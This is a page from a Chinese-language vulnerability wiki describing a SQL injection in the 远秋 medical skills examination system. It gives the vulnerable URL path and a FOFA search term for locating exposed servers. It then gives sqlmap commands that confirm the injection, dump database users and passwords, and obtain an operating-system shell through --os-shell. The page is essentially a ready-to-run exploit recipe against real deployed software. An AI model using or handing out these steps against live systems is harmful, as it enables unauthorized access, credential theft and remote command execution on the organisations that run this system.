Qingy 漏洞文库

Remember to check for updates!

Qingy 漏洞文库

IOT安全
Web安全
免杀技巧
系统安全
- Linux
  - Linux本地提权漏洞
  - Linux远程溢出漏洞
    - （CVE-2017-7494）Linux Samba 远程代码执行.md
- Windows
  - Windows本地提权漏洞
  - Windows远程溢出漏洞
软件工具安全
- Xmind
  - XMind 2021 11.0 Beta 1 XSS漏洞导致命令执行.md
index.md

Toggle source

远秋医学技能考试系统SQL注入漏洞

漏洞描述

远秋医学技能考试系统存在SQL注入漏洞，可获取后台密码可os-shell获得shell

漏洞影响

远秋医学技能考试系统

FOFA

远秋医学技能考试系统

漏洞复现

存在漏洞的路径为：

http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1

直接SQLmap梭哈

检测是否存在注入和跑账号密码：

sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1" -p id -batch

sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1" -users
sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1" --password

一般为DBA权限，直接上os-shell

sqlmap -u "http://xxx.xxx.xxx.xxx/NewsDetailPage.aspx?key=news&id=1" --random-agent --os-shell